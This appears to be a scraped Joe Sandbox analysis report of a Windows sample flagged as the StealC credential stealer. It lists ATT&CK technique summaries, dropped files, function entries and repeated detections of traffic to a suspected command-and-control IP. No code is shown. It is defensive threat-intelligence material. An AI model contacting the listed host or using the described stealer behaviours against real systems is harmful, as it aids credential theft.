Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAFBAKECAEGCBFIEGDGI

C:\ProgramData\AEHIJDAF

C:\ProgramData\AFHDAKJKFCFBGCBGDHCB

C:\ProgramData\BFCGDAAKFHIDBFIDBKFHJDHCAF

C:\ProgramData\CFHIIEHJKKECGCBFIIJDAKFHJK

C:\ProgramData\DBKKFCBAKKFBGCBFHJDGDGDHCA

C:\ProgramData\EBGDHJECFCFCAKFHCFID

C:\ProgramData\HJECAAKK

C:\ProgramData\IJDGCAEBFIIECAKFHIJEGIJEGC

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

C:\ProgramData\softokn3.dll

Windows Analysis Report
file.exe

Function 00960090 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 00969270 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 00954610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0095BCB0 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C6735A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 009643F0 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 009548D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 009695E0 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00957750 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00955150 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre